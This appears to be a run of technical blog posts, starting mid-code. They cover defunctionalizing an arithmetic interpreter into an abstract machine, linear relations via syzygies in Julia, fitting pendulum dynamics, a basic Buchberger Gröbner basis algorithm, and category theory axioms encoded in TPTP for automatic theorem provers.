p = (x1[1]^2 + x1[2]^2 + x1[3]^2 + R^2 - r^2)^2 - 4R^2 * (x1[1]^2 + x1[2]^2)
box = -1:0.005:1
img = Gray.([ raytrace(x,y,p) for x=box, y=box ])
save("torus.jpg",img)
```

Some thoughts on speeding up: move the polynomial manipulations out of the loop. Perhaps partially evaluate with respect to the polynomial? That’d be neat. And of course, parallelize.

Functional programming is cool and useful, but it isn’t clear how to implement the features functional languages provide on hardware that is controlled by assembly code. Achieving this is a fairly large topic. One step on the way is the concept of an abstract machine.

Abstract machines make more explicit how to evaluate a program by defining a step relationship taking a state of the machine to another state. I think this may be closer to how hardware is built, because hardware is a physical system. Physical systems are often characterizable by their space of states and the transitions or time evolution of them. That’s Newtonian mechanics in a nutshell.

There is a methodology by which to connect the definitions of abstract machines to interpreters of lambda calculus.

- Convert to continuation passing style to make the evaluation order explicit
- Defunctionalize these continuations

However, the lambda calculus is a nontrivial beast and really only one member of a spectrum of different programming language features. Here is an incomplete set of features that you can mix and match:

- Arithmetic expressions
- Boolean expressions
- let bindings
- Printing/Output
- Reading/Input
- Mutation, References
- For/While loops
- Named Global Procedures
- Recursion
- Lambda terms / Higher Order Functions
- Call/CC
- error throw try catch
- Algebraic Data Types
- Pattern matching

In my opinion, the simplest of any of these is arithmetic expressions and with only this you can already meaningfully explore this evaluator to abstract machine translation.

First we need a data type for arithmetic

`data AExpr = Lit Int | Add AExpr AExpr deriving (Eq, Show)`

Pretty basic. We could easily add multiplication and other operators and it doesn’t change much conceptually except make things larger. Then we can define a simple interpreter.

```
type Value = Int
eval :: AExpr -> Value
eval (Add x y) = (eval x) + (eval y)
eval (Lit i) = i
```

The first step of our transformation is to put everything in continuation passing style (cps). The way this is done is to add an extra parameter `k` to every function call. When we want to return a result from a function, we now call `k` with that result instead. You can kind of think of it as a goofy `return` statement. `eval'` is equivalent to `eval` above.

```
evalk :: AExpr -> (Value -> Value) -> Value
evalk (Add x y) k = evalk x (\vx -> (evalk y $ \vy -> k (vx + vy)))
evalk (Lit i) k = k i
eval' :: AExpr -> Value
eval' e = evalk e id
```

Now we defunctionalize this continuation. We note that the higher order continuation parameter takes only a finite number of possible shapes if `evalk` is only accessed via the above code. `k` can either be `id`, `(\vx -> (evalk y $ \vy -> k (vx + vy)))`, or `\vy -> k (vx + vy)`. We give each of these code shapes a constructor in a data type. The constructor needs to hold any values closed over (free variables in the expression). `id` needs to remember nothing, `\vx -> (evalk y $ \vy -> k (vx + vy))` needs to remember `y` and `k`, and `\vy -> k (vx + vy)` needs to remember `vx` and `k`.

`data AHole = IdDone | AddL AExpr AHole | AddR Value AHole `

What functions *are* is a thing that can be applied to its arguments. We can use `AHole` exactly as before by defining an `apply` function.

```
apply :: AHole -> Value -> Value
apply IdDone v = v
apply (AddL e k) v = evald e (AddR v k)
apply (AddR v' k) v = apply k (v' + v)
```

And using this we can convert `evalk` into a new form by replacing the continuations with their defunctionalized data type.

```
evald :: AExpr -> AHole -> Value
evald (Add x y) k = evald x (AddL y k)
evald (Lit i) k = apply k i
eval'' e = evald e IdDone
```

We can make this into more of a machine by inlining `apply` into `evald` and breaking up the tail recursion into individual steps. Now we have a step relation on a state consisting of continuation data `AHole` and program information `AExpr`. Every step makes progress towards evaluating the expression. If you squint a little, this machine is basically an RPN machine for evaluating arithmetic.

```
data Machine = Machine { prog :: AExpr , kont :: AHole }

step :: Machine -> Either Value Machine
step (Machine (Add x y) k) = Right $ Machine x (AddL y k)
step (Machine (Lit i) (AddL e k)) = Right $ Machine e (AddR i k)
step (Machine (Lit i) (AddR v k)) = Right $ Machine (Lit (i + v)) k
step (Machine (Lit i) IdDone) = Left i

init_machine e = Machine e IdDone

-- https://hackage.haskell.org/package/extra-1.7.4/docs/src/Control.Monad.Extra.html#loop
loop :: (a -> Either b a) -> a -> b
loop act x = case act x of
    Right x' -> loop act x'
    Left v -> v

eval'''' e = loop step (init_machine e)
```
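
To see the machine run, here is a hand trace (mine, stepping through the rules above) of `(1 + 2) + 3`:

```
Machine (Add (Add (Lit 1) (Lit 2)) (Lit 3)) IdDone
Machine (Add (Lit 1) (Lit 2)) (AddL (Lit 3) IdDone)
Machine (Lit 1) (AddL (Lit 2) (AddL (Lit 3) IdDone))
Machine (Lit 2) (AddR 1 (AddL (Lit 3) IdDone))
Machine (Lit 3) (AddL (Lit 3) IdDone)
Machine (Lit 3) (AddR 3 IdDone)
Machine (Lit 6) IdDone
Left 6
```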

Pretty neat right?

Now the next simplest steps in my opinion would be to add Booleans, Let expressions, and Print statements. Then after grokking that, I would attempt the CEK and Krivine Machines for lambda calculus.

Defunctionalizing arithmetic can be found in https://www.brics.dk/RS/01/23/BRICS-RS-01-23.pdf – Defunctionalization at Work – Danvy and Nielson

https://homepages.inf.ed.ac.uk/wadler/papers/papers-we-love/reynolds-definitional-interpreters-1998.pdf Definitional Interpreters for Higher Order Programming Languages – Reynolds 1972. The grand daddy paper of defunctionalization

https://tidsskrift.dk/brics/article/download/21784/19215 – A Journey from Interpreters to Compilers and Virtual Machines – Mads Sig Ager, Dariusz Biernacki, Olivier Danvy, Jan Midtgaard

http://www.pathsensitive.com/2019/07/the-best-refactoring-youve-never-heard.html Best Refactoring You’ve never Heard of by Jimmy Koppel.

Xavier Leroy abstract machine slides https://xavierleroy.org/mpri/2-4/

https://caml.inria.fr/pub/papers/xleroy-zinc.pdf – Leroy’s description of the Zinc Machine

CEK machine – Matt Might http://matt.might.net/articles/cek-machines/

https://github.com/rain-1/continuations-study-group/wiki/Reading-List

https://semantic-domain.blogspot.com/2020/02/thought-experiment-introductory.html Neel Krishnaswami’s hypothetical compiler course.

The idea is to reimplement the ideas here computing linear relations: https://www.philipzucker.com/linear-relation-algebra-of-circuits-with-hmatrix/ . There is a lot more context written in that post, and it is probably necessary background for this one.

Linear relations algebra is a refreshing perspective for me on systems of linear equations. It has a notion of composition that seems, dare I say, almost as useful as matrix multiplication. Very high praise. This composition has a more bidirectional flavor than matrix multiplication, which makes it a good fit for describing physical systems, in which interconnection always influences both ways.

In the previous post, I used nullspace computations as my workhorse. The nullspace operation allows one to switch between a constraint (nullspace) and a generator (span) picture of a vector subspace. The generator view is useful for projection and linear union, and the constraint view is useful for partial-composition and intersection. The implementation of linear relation composition requires flipping between both views.

I’m reimplementing it in Julia for 2 reasons

- To use the Julia ecosystem’s implementations of module operations
- to get a little of that Catlab.jl magic to shine on it.

It was a disappointment of the previous post that I could only treat resistor-like circuits. The new twist of using module packages allows treatment of inductor/capacitor circuits and signal flow diagrams.

When you transform into Fourier space, systems of linear differential equations become systems of polynomial equations: differentiation d/dt turns into multiplication by iω, which is where the `diff = scale(i*s)` below comes from. From this perspective, modules seem like the appropriate abstraction rather than vector spaces. Modules are basically vector spaces where one doesn’t assume the operation of scalar division; in other words, the scalars are rings rather than fields. Polynomials are rings, not fields. In order to treat the new systems, I still need to be able to do linear algebraic-ish operations like nullspaces, except where the entries of the matrix are polynomials rather than floats.

Syzygies are basically the module analog of nullspaces. Syzygies are the combinations of generators that combine to zero. Considering the generators of a submodule as being column vectors, stacking them together makes a matrix. Taking linear combinations of the columns is what happens when you multiply a matrix by a vector. So the syzygies are the space of vectors for which this matrix multiplication gives 0, the “nullspace”.
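
A tiny example to fix ideas: over a polynomial ring, the 1×2 matrix [x y] has the syzygy (y, -x), since x*y + y*(-x) = 0, and in fact every syzygy of it is a multiple of that one.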

Computer algebra packages offer syzygy computations. Julia has bindings to Singular, which does this. I have been having a significant and draining struggle to wrangle these libraries though. Am I going against the grain? Did the library authors go against the grain? Here’s what I’ve got, trying to match the Catlab naming conventions:

```
using Singular
import Nemo
using LinearAlgebra # : I

CC = Nemo.ComplexField(64)
P, (s,) = PolynomialRing(CC, ["s"])
i = Nemo.onei(CC) # P(i) ? The imaginary number

# helpers to deal with Singular.jl
eye(m) = P.(Matrix{Int64}(I, m, m)) # There is almost certainly a better way of doing this. Actually dispatching Matrix?
zayro(m,n) = P.(zeros(Int64,m,n)) # new zeros method?
mat1(m::Int64) = fill(P(m), (1,1) )
mat1(m::Float64) = fill(P(m), (1,1) )
mat1(m::spoly{Singular.n_unknown{Nemo.acb}}) = fill(m, (1,1))

# Objects are the dimensionality of the vector space
struct DynOb
    m::Int
end

# Linear relations represented by input and output constraint matrices
struct DynMorph
    input::Array{spoly{Singular.n_unknown{Nemo.acb}},2}
    output::Array{spoly{Singular.n_unknown{Nemo.acb}},2}
end

dom(x::DynMorph) = DynOb(size(x.input)[2])
codom(x::DynMorph) = DynOb(size(x.output)[2])
id(X::DynOb) = DynMorph(eye(X.m), -eye(X.m))

# add together inputs
plus(X::DynOb) = DynMorph( [eye(X.m) eye(X.m)] , - eye(X.m) )
mcopy(X::DynOb) = DynMorph( [eye(X.m) ; eye(X.m)] , -eye(2*X.m) ) # copy input
delete(A::DynOb) = DynMorph( fill(P.(0),(0,A.m)) , fill(P.(0),(0,0)) )
create(A::DynOb) = DynMorph( fill(P.(0),(0,0)) , fill(P.(0),(0,A.m)) )
dagger(x::DynMorph) = DynMorph(x.output, x.input)

# cup and cap operators
dunit(A::DynOb) = compose(create(A), mcopy(A))
dcounit(A::DynOb) = compose(plus(A), delete(A)) # plus plays the role of mmerge here

scale(M) = DynMorph( mat1(M), mat1(-1))
diff = scale(i*s) # differentiation = multiplying by i omega
integ = dagger(diff)
#cupboy = DynMorph( [mat1(1) mat1(-1)] , fill(P.(0),(1,0)) )
#capboy = transpose(cupboy)
#terminal

# relational operations
# The meet
# Inclusion
# I think this is a nullspace calculation?
# almost all the code is trying to work around Singular's interface to one I can understand
function quasinullspace(A)
    rows, cols = size(A)
    vs = Array(gens(Singular.FreeModule(P, rows)))
    q = [sum(A[:,i] .* vs) for i in 1:cols]
    M = Singular.Module(P,q...)
    S = Singular.Matrix(syz(M)) # syz is the only meat of the computation
    return Base.transpose([S[i,j] for j=1:Singular.ncols(S), i=1:Singular.nrows(S) ])
end

function compose(x::DynMorph,y::DynMorph)
    nx, xi = size(x.input)
    nx1, xo = size(x.output)
    @assert nx1 == nx
    ny, yi = size(y.input)
    ny1, yo = size(y.output)
    @assert ny1 == ny
    A = [ x.input                x.output  P.(zeros(Int64,nx,yo)) ;
          P.(zeros(Int64,ny,xi)) y.input   y.output               ]
    B = quasinullspace(A)
    projB = [B[1:xi ,:] ;
             B[xi+yi+1:end,:] ]
    C = Base.transpose(quasinullspace(Base.transpose(projB)))
    return DynMorph( C[:, 1:xi] , C[:,xi+1:end] )
end

# basically the direct sum. The monoidal product of linear relations
function otimes( x::DynMorph, y::DynMorph)
    nx, xi = size(x.input)
    nx1, xo = size(x.output)
    @assert nx1 == nx
    ny, yi = size(y.input)
    ny1, yo = size(y.output)
    @assert ny1 == ny
    return DynMorph( [ x.input                P.(zeros(Int64,nx,yi)) ;
                       P.(zeros(Int64,ny,xi)) y.input ],
                     [ x.output               P.(zeros(Int64,nx,yo)) ;
                       P.(zeros(Int64,ny,xo)) y.output ])
end
```

I think this does basically work but it’s clunky.

I need to figure out Catlab’s diagram drawing abilities enough to show some circuits and some signal flow diagrams. Wouldn’t that be nice?

I should show concrete examples of composing passive filter circuits together.

There is a really fascinating paper by Jan Willems where he digs into a beautiful picture of this that I need to revisit https://homes.esat.kuleuven.be/~sistawww/smc/jwillems/Articles/JournalArticles/2007.1.pdf

https://golem.ph.utexas.edu/category/2018/06/the_behavioral_approach_to_sys.html

Is all this module stuff stupid? Should I just use rational polynomials and be done with it? Sympy? The point is that s·X = s·Y and X = Y are different equations, describing different behaviors (you can’t divide by s in a module, and indeed dx/dt = dy/dt does not imply x = y). Am I even capturing that though? Is my syzygy powered composition even right? It seemed to work on a couple small examples and I think it makes sense. I dunno. Open to comments.

Because univariate polynomials form a principal ideal domain (PID), we can also use Smith normal forms rather than syzygies, is my understanding. Perhaps AbstractAlgebra.jl might be a better tool?

Will the syzygy thing be good for band theory? We’re in the multivariate setting then, so Smith normal form no longer applies.

We’ve been building a Raspberry Pi controlled pendulum that we want to control over the internet, and the problem came up of trying to get a simulation to match the physical pendulum.

We weighed the pendulum and calculated the torque due to gravity, τ = m g (L/2) sin(θ) (you can think of it as the full force of gravity acting on the lever arm of the center of the pole), and the moment of inertia of a rod about its end, I = m L^2 / 3.

However, it is difficult to estimate the torque supplied by the motor. Motors have surprisingly complicated behavior. It is also difficult from first principles to estimate damping or friction terms.

There are a couple different experimental stratagems for a pendulum. One thing we tried was setting the pendulum on its side and setting the motor duty cycle to different values. From this you can fit a parabola to those curves and get an acceleration constant for the different motor settings, as sketched below. Experimentally speaking, the acceleration seemed roughly linear in the motor PWM duty cycle.
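
A minimal sketch of that fit (mine; `ts` and `thetas` stand for hypothetical arrays of recorded times and angles for one duty cycle setting):

```
import numpy as np

# under constant torque, theta(t) ≈ 0.5*accel*t**2 + v0*t + theta0
coeffs = np.polyfit(ts, thetas, 2)  # quadratic, linear, constant coefficients
accel = 2 * coeffs[0]               # the quadratic coefficient is accel/2
```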

Another stratagem is to take resonance curves for the pendulum. Try exciting it with different sinusoidal torques at a sweep of frequencies. From this curve you can recover a resonance frequency and damping coefficients.

These all make sense as kind of ersatz methods. We’re taking our intuitive understanding of the system and other results from simpler or related systems and combining them together.

An interesting alternative approach to the above is to drive the pendulum with a random torque and then fit a parameterized model of the equations of motion to the observed acceleration. The model should include at the least a gravity term, a motor torque term, and damping terms. A simple start is α = a·sin(θ) + b·θ̇ + c·u, where u is the motor duty cycle. This is a linear model with respect to the coefficients and can be solved by least squares.

I’ve come to appreciate scikit-learn for fitting. It doesn’t have the hottest most high falutin’ fads, but it’s got a lot of good algorithms in it that just work, are damn easy to use, and are easy to swap different possibilities in and out of. Even though I know how to more manually set up a least squares system or solve a LASSO problem via cvxpy, it makes it really easy and clean. I’ve started reaching for it for fast attacks on fitting problems.

We mocked out our interface to behave similarly to an OpenAI gym interface. Because of this, the observations already have the cosine and sine terms that might be of interest, and the angular velocity value that would be used for a simple damping term proportional to θ̇.

```
import gym
import time
import numpy as np
env = gym.make('pendulum-v0')
observation = env.reset()
action = 0
dt = 0.05
obs = []
rews = []
actions = []
for i in range(1000):
    # A random walk for actions.
    # we need the actions to be slow changing enough to see trends
    # but fast enough to see interesting behavior
    # tune this by hand
    action += np.random.randn() * dt
    action = max( min(action, 2 ), -2)
    observation, reward, done, info = env.step([action])
    obs.append(observation)
    actions.append(action)
    rews.append(reward)
    time.sleep(0.05)
obs = np.array(obs) # obs includes thetadot, cos(theta), sin(theta). A good start.
actions = np.array(actions) # the pwm value used
# data to predict alpha from. Each row is a data point from one time step.
X = np.hstack( (obs[:-1, :] , actions[:-1].reshape(-1,1)) )
alphas = (obs[1:,2] - obs[:-1,2] ) / dt #angular acceleration
# feel free to swap in LASSO or other regressors
from sklearn.linear_model import LinearRegression
# fit the observed angular acceleration as a function of X
reg = LinearRegression().fit(X, alphas)
print(f"intercept : {reg.intercept_}, coeffs : {reg.coef_} ")
```

The number that came out for the gravity term matched the number calculated from first principles to within 10%. Not bad!

A thing that is nice about this approach is that one is able to add terms into the dynamics for which we don’t have good intuitive models to compare to, like your good ole Physics I Coulombic friction term or other nonlinearities.
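
For example (my own sketch, reusing `X` and `obs` from the code above), a Coulomb friction term proportional to sign(θ̇) is just one more column in the regression:

```
# append sign(thetadot) as an extra feature; its fitted coefficient is the Coulomb term
X = np.hstack((X, np.sign(obs[:-1, 2]).reshape(-1, 1)))
```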

- Linkages
- Geometrical theorem proving. Circles are x^2 + y^2 - 1 = 0 and so on.
- Optics
- Constraint satisfaction problems. x^2 - 1 = 0 gives you a boolean variable. It’s a horrible method but it works if your computer doesn’t explode.
- Energy and momentum conservation. “Classical Feynman Diagrams” p1 + p2 = p3 + p4 and so on.
- Frequency domain circuits and linear dynamical systems; more on this another day

To learn more about Grobner bases I highly recommend Cox, Little, and O’Shea’s Ideals, Varieties, and Algorithms.

To understand what a Grobner basis is, first know that univariate polynomial long division is a thing. It’s useful for determining if one polynomial is a multiple of another. If so, then you’ll find the remainder is zero.
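
For instance (a quick sketch using DynamicPolynomials, which appears later in this post; I’m assuming its two-argument `divrem` behaves like the list version used in the code below):

```
using DynamicPolynomials
@polyvar x
q, r = divrem(x^2 - 1, x - 1)
# q == x + 1 and r == 0, so x^2 - 1 is a multiple of x - 1
```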

One could want to lift the problem of determining if a polynomial is a multiple of others to multivariate polynomials. Somewhat surprisingly, the definition of long division has some choice in it. Sure, x^2 is a term that is ahead of x, but is x a larger term than y? Than y^2? These different choices are admissible. In addition, now one has systems of equations. Which equation do we divide by first? It turns out to matter and change the result. That is, unless one has converted into a Grobner basis.

A Grobner basis is a set of polynomials such that the remainder under multivariate polynomial division becomes unique, regardless of the order in which division occurs.

How does one find such a basis? In essence, kind of by brute force. Whenever two polynomials’ leading terms overlap, division could proceed two ways depending on your choice; the s-polynomial is the difference of those two ways. You consider all such pairs, and whenever an s-polynomial doesn’t reduce to zero, you add it to the basis and repeat.

Julia has packages for multivariate polynomials. https://github.com/JuliaAlgebra/MultivariatePolynomials.jl defines an abstract interface and generic functions. DynamicPolynomials gives flexible representation for construction. TypedPolynomials gives a faster representation.

These already implement a bulk of what we need to get a basic Buchberger going: Datastructures, arithmetic, and division with remainder. With one caveat, there is already a picked monomial ordering. And it’s not lexicographic, which is the nice one for eliminating variables. This would not be too hard to change though?

Polynomial long division with respect to a set of polynomials is implemented here.

Unfortunately (or fortunately? A good learning experience. Learned some stuff about datastructures and types in Julia, so that’s nice), quite late I realized that a very similar Grobner basis algorithm to the one below is implemented inside of the SemiAlgebraic.jl package. Sigh.

```
using MultivariatePolynomials
using DataStructures

function spoly(p,q)
    pq = lcm(leadingmonomial(p),leadingmonomial(q))
    return div( pq , leadingterm(p) ) * p - div(pq , leadingterm(q)) * q
end

function isgrobner(F::Array{T}) where {T <: AbstractPolynomialLike} # check buchberger criterion
    for (i, f1) in enumerate(F)
        for f2 in F[i+1:end]
            s = spoly(f1,f2)
            _,s = divrem(s,F)
            if !iszero(s)
                return false
            end
        end
    end
    return true
end

function buchberger(F::Array{T}) where {T <: AbstractPolynomialLike}
    pairs = Queue{Tuple{T,T}}()
    # initialize with all pairs from F
    for (i, f1) in enumerate(F)
        for f2 in F[i+1:end]
            enqueue!(pairs, (f1,f2))
        end
    end
    # consider all possible s-polynomials and reduce them
    while !isempty(pairs)
        (f1,f2) = dequeue!(pairs)
        s = spoly(f1,f2)
        _,s = divrem(s,F)
        if !iszero(s) # isapproxzero? Only add to our set if doesn't completely reduce
            for f in F
                enqueue!(pairs, (s,f))
            end
            push!(F,s)
        end
    end
    # reduce redundant entries in grobner basis.
    G = Array{T}(undef, 0)
    while !isempty(F)
        f = pop!(F)
        _,r = divrem(f, vcat(F,G))
        if !iszero(r)
            push!(G,r)
        end
    end
    return G
end
```

Some usage. You can see here that Gaussian elimination, implemented by the backslash operator, is a special case of taking the Grobner basis of a linear set of equations:

```
using DynamicPolynomials
@polyvar x y
buchberger( [ x + 1.0 + y , 2.0x + 3y + 7 ] )
#=
2-element Array{Polynomial{true,Float64},1}:
-0.5y - 2.5
x - 4.0
=#
[ 1 1 ; 2 3 ] \ [-1 ; -7]
#=
2-element Array{Float64,1}:
4.0
-5.0
=#
buchberger( [ x^3 - y , x^2 - x*y ])
#=
3-element Array{Polynomial{true,Int64},1}:
-xy + y²
y³ - y
x² - y²
=#
```

Many improvements are possible. This is not a good Buchberger implementation, but it is simple. See http://www.scholarpedia.org/article/Buchberger%27s_algorithm for some tips, which include criteria for avoiding unneeded s-polynomial pairs, and smart ordering. Better Buchberger implementations will use the f4 or f5 algorithm, which use sparse matrix facilities to perform many division steps in parallel. My vague impression of the f4 algorithm is that you prefill a sparse matrix (rows correspond to an s-polynomial or monomial multiple of your current basis, columns correspond to monomials) with monomial multiples of your current basis that you know you might need.

In my implementation, I’m tossing away the div part of `divrem`. It can be useful to retain these so you know how to write your Grobner basis in terms of the original basis.

You may want to look at the Julia bindings in Singular.jl.

- https://mattpap.github.io/masters-thesis/html/src/groebner.html
- https://www-polsys.lip6.fr/~jcf/FGb/index.html
- https://github.com/wbhart/Singular.jl
- https://www.philipzucker.com/dump-of-nonlinear-algebra-algebraic-geometry-notes-good-links-though/
- https://www.philipzucker.com/computing-syzygy-modules-in-sympy/
- https://www.philipzucker.com/grobner-bases-and-optics/
- https://scicomp.stackexchange.com/questions/21699/benchmarks-for-gr%c3%b6bner-bases-and-polynomial-system-solution
- https://mathoverflow.net/questions/322518/computing-groebner-basis-for-a-complicated-systems-of-polynomials
- https://cstheory.stackexchange.com/questions/12326/unification-and-gaussian-elimination
- https://homepage.divms.uiowa.edu/~fleck/181content/taste-fixed.pdf
- http://www.scholarpedia.org/article/Buchberger%27s_algorithm
- https://doc.sagemath.org/html/en/reference/polynomial_rings/sage/rings/polynomial/toy_buchberger.html
- Operads grobner https://www.maths.tcd.ie/~vdots/AlgebraicOperadsAnAlgorithmicCompanion.pdf What the heck. From Evan’s site https://www.epatters.org/wiki/algebra/computational-category-theory.html
- https://github.com/tkluck/FGb.jl

There are a number of projects formalizing category theory in these systems

- https://github.com/agda/agda-categories
- https://github.com/statebox/idris-ct
- https://github.com/jwiegley/category-theory
- https://arxiv.org/pdf/1401.7694.pdf
- https://www.isa-afp.org/ search for category. There are a couple.
- https://mathoverflow.net/questions/152497/formalizations-of-category-theory-in-proof-assistants – Thanks to Eduardo Ochs for pointing this out
- Many more

All of these systems are using some variant of higher order logic where you can quantify over propositions. This is very expressive, but also more difficult to automate (they *do* have significant automation in them though, but this tends to be for filling in the relatively obvious intermediate details of a proof, not complete automation). Perhaps this has some relation to Gödel’s incompleteness theorem.

There are other classes of theorem proving systems: automatic theorem provers and SMT solvers. Can we do category theory in them? Doesn’t Automatic sound real nice in principle?

ATP and SMT are similar in some respects but are architected differently and have slightly different use cases and strengths:

- SMT solvers are based around SAT solvers and tractable sub problems (theories). They have subsystems that deeply understand linear equations, linear inequalities, systems of polynomials, theory of uninterpreted functions, bit-blasting, others. They combine these facilities via the Nelson-Oppen procedure. They are fairly weak at quantifier reasoning. They are good at problems that require lots of domain specific understanding. Examples of SMT solvers include Z3, CVC4, Alt Ergo, Boolector. You can find more and comparisons at the SMT competition
- While the term Automatic Theorem Prover (ATP) could mean anything, it has a tendency to denote a class of first order logic solvers based around resolution. Examples of such provers include Vampire, E, and Prover9. You can find more at the CADE competition. They are more oriented to abstract first order logic structures and quantifier reasoning.

A big downside of automatic methods is that once they start to fail, you’re more hosed than the interactive provers. Until then, it’s great though.

Category theory proofs have a feeling of being close to trivial (at least the ones I’ve seen, but I’ve mostly seen the trivial ones so…? ), amounting to laboriously expanding definitions and rewrite equations corresponding to commutation conditions. An automatic system to verify these seems useful.

What are the kinds of questions one wants to ask these provers?

- Confirmation that a concrete mathematical structure (integers, reals, bools, abstract/concrete preorder, group, lattice) obeys the required categorical axioms/interface. The axioms of category structures are the *conjectures* here.
- Confirmation that abstract categorical constructions do what they’re supposed to. One presupposes categorical axioms and structures and asks conjecture conclusions. For example, given this square, does this other diagram commute? Is this “diagram chasing”?

These are yes/no questions. Although in the case of no, often a counterexample is emitted which can help show where you went awry. A third task that is more exciting to me, but harder and not an obvious stock capability of these provers is

- Calculate/construct something categorical. For example, we might want to construct a condensed or efficient version of some program given by a categorical spec, or emit a categorical construction that has certain properties. There are clear analogies with program verification vs. program synthesis.

Now it appears that to some degree this is possible. I have noted that in the proof output, one can sometimes find terms that may correspond to the thing you desire, especially if you ask an existential conjecture, “does there exists a morphism with such and such a property”.

TPTP is both a problem library and a specification language for first order problems for the purposes of computer provers. There is a nice overview video here. There is a nice web interface to explore different provers here. The TPTP library contains four different axiomatizations for categories, and a number of problems:

- http://www.tptp.org/cgi-bin/SeeTPTP?Category=Axioms&File=CAT001-0.ax
- http://www.tptp.org/cgi-bin/SeeTPTP?Category=Axioms&File=CAT002-0.ax
- http://www.tptp.org/cgi-bin/SeeTPTP?Category=Axioms&File=CAT003-0.ax
- http://www.tptp.org/cgi-bin/SeeTPTP?Category=Axioms&File=CAT004-0.ax

There is a good set of videos explaining how to formalize category axioms in a first order setting: https://www.youtube.com/watch?v=NjDZMWdDJKM&list=PL4FD0wu2mjWOtmhJsiVrCpzOAk42uhdz8&index=6&t=0s. He has a couple of different formulations, actually. It’s interesting. Here’s a math.stackexchange question https://math.stackexchange.com/questions/2383503/category-theory-from-the-first-order-logic-point-of-view along with a small discussion of why it’s wrongheaded to even do such a thing. I’m not sure I agree with the second part.

Here is my encoding. I am not 100% confident anything I’ve done here is right. Note that composition is expressed as a ternary relation. This is one way of handling the fact that, without a stronger typing discipline, composition is a *partial* binary function: in order to compose, morphisms need to meet on an intermediate object. Categorical “typing” is expressed via logical constraints on the relation.

A trick one can use is to identify the identity arrows with the objects at which they are based. Since every object is required to have an identity arrow, and every identity arrow points from and to a single object, they are in isomorphism. In the encoding below, `dom(F)` and `cod(F)` return these identity arrows directly, as in the axiom `comp(cod(F),F,F)`. There is some conceptual unclarity that comes from this trick though. I’m not totally sold.

TPTP syntax is mostly straightforward, but note that `! [X]` is forall X, `? [X]` is exists X, capital names are variables, and lowercase names are constants. Quantifiers bind tighter than I personally expected, hence my parenthesis explosion.

```
% axioms of a category
% we would resupply this for every category involved?
% ! [X] is forall X, ? [X] is exists X. Capital names are variables
% lowercase names are constants.
fof( dom_cod, axiom, ![X] : dom(cod(X)) = cod(X)).
fof( cod_dom, axiom, ![X] : cod(dom(X)) = dom(X)).
fof( comp_is_unique, axiom, ![F, G, FG1, FG2] : ((comp(F,G,FG1) & comp(F,G,FG2)) => FG1 = FG2) ).
fof( comp_objects_middle, axiom, ![F, G] : ((? [FG] : comp(F,G,FG)) <=> dom(F) = cod(G))).
fof( comp_dom, axiom, ![F, G, FG] : (comp(F,G,FG) => dom(G) = dom(FG))).
fof( comp_cod, axiom, ![F, G, FG] : (comp(F,G,FG) => cod(F) = cod(FG))).
fof( left_id, axiom, ![F] : comp(cod(F),F,F) ).
fof( right_id, axiom, ![F] : comp(F,dom(F),F) ).
% I've heard that composition axioms cause churn?
fof( comp_assoc, axiom, ![F, G, H, FG, GH, FGH1, FGH2] : ((comp(F,G,FG) & comp(FG,H,FGH1) & comp(F,GH,FGH2) & comp(G,H,GH)) => FGH1 = FGH2 )).
```

Here are some definitions. One could also just inline these definitions with a macro system. Uniqueness quantification occurs in universal properties. It’s a somewhat subtle idea to encode into ordinary first order logic, which has no uniqueness quantifier: the standard expansion of “there exists a unique X such that p(X)” is `? [X] : (p(X) & ![Y] : (p(Y) => Y = X))`. Are some encodings better than others? Another place where macros to generate TPTP files would be useful. Uniqueness quantification is naturally expressible as a higher order predicate.

```
fof(monic_def, axiom,
![M] : (monic(M) <=> (! [F,G] : (( ? [H] : (comp(M, F, H) & comp(M,G,H))) => F = G)))).
fof(commute_square_def, axiom,
![F,G,H,K] : (commute_square(F,G,H,K) <=> (? [M] : (comp(F,G,M) & comp(H,K,M))))).
fof(pullback_def, axiom,
![F,G,P1,P2] : (pullback(F,G,P1,P2) <=>
(commute_square(F,P1,G,P2) &
(![Q1,Q2] : (commute_square(F,Q1,G,Q2) =>
(?[U] : (! [U1] : ((comp(P1,U1,Q1) & comp(P2,U1,Q2)) <=> (U1 = U))))
))))).
```

Here are some pretty simple problems:

```
% should be a trivial statement, but isn't literally an axiom.
fof( codcod, conjecture, ![F] : cod(cod(F)) = cod(F) ).
% paste two commuting squares together gives another commuting square
fof( pasting_square,conjecture, ![A,B,C,D, I,J,K, IB, JC] : ((commute_square(B,A,D,C) & commute_square(I,D,K,J) & comp(I,B, IB) & comp( J, C,JC))
=> commute_square( IB,A, K,JC ) )).
```

One theorem that is not quite so trivial is that the pullback of a monic is monic https://math.stackexchange.com/questions/2957202/proving-the-pullback-of-monics-is-monic. It’s ultimately not that complicated, and yet difficult enough that it took me a lot of head scratching. It crucially uses the uniqueness property of the pullback. Here’s an encoding of the conjecture.

```
include('cat.tptp').
include('constructions.tptp').
% warmup?
%fof(pullback_monic, conjecture, ![M, P1,P2] : ((monic(M) & pullback(cod(M),M,P1,P2)) => %monic(P2))).
% pullback of monic is monic
fof(pullback_monic, conjecture, ![M, F, P1,P2] : ((monic(M) & pullback(F,M,P1,P2)) => monic(P1))).
```

Invoking the prover:

`eprover --auto-schedule --cpu-limit=60 --proof-object monic_pullback.tptp`

Vampire appears to do it faster. Again, the easiest way to try it yourself or compare other solvers is the web interface, System on TPTP http://www.tptp.org/cgi-bin/SystemOnTPTP. Caveat: given how many times I’ve screwed up writing this post, I’d give a 40% chance that the final theorem is actually expressing what I intended it to.

Encoding our questions into first order logic, which is powerful but not fully expressive, requires a lot of “macro”-like repetitiveness, when it is possible at all. I have found through experience that the extra macro capabilities given by Python for emitting Z3 problems are extremely powerful. For this reason, we should use a real programming language to emit these problems. I think the logical candidate is Julia and the Catlab library. One unknown question: will this repetitiveness choke the theorem prover?
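As a small illustration of what I mean, here is a hypothetical Julia sketch (the helper names are mine, not Catlab’s actual API): a TPTP clause is just a formatted string, so families of definitions can be stamped out in a loop.

```
# hypothetical helper: print one TPTP fof clause
fof(name, role, formula) = println("fof($name, $role, $formula).")

# stamp out monic assumptions for a family of named morphisms
for m in [:f, :g, :h]
    fof("$(m)_monic", "axiom", "monic($m)")
end
# prints: fof(f_monic, axiom, monic(f)). and so on
```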

Categorical Constructions that one might want to encode:

- Monic
- Epic
- Commuting Squares
- Pullbacks
- Pushouts
- products
- coproducts
- exponential objects
- Subobject classifiers
- Finite categories
- Functors
- Natural transformations
- Adjunctions
- Kan Extensions
- PreSheaves

Theorems that seem possible (surely there are many more):

- The pullback of a monic is monic
- five lemma,
- the snake lemma,
- the zig-zag lemma,
- and the nine lemma.
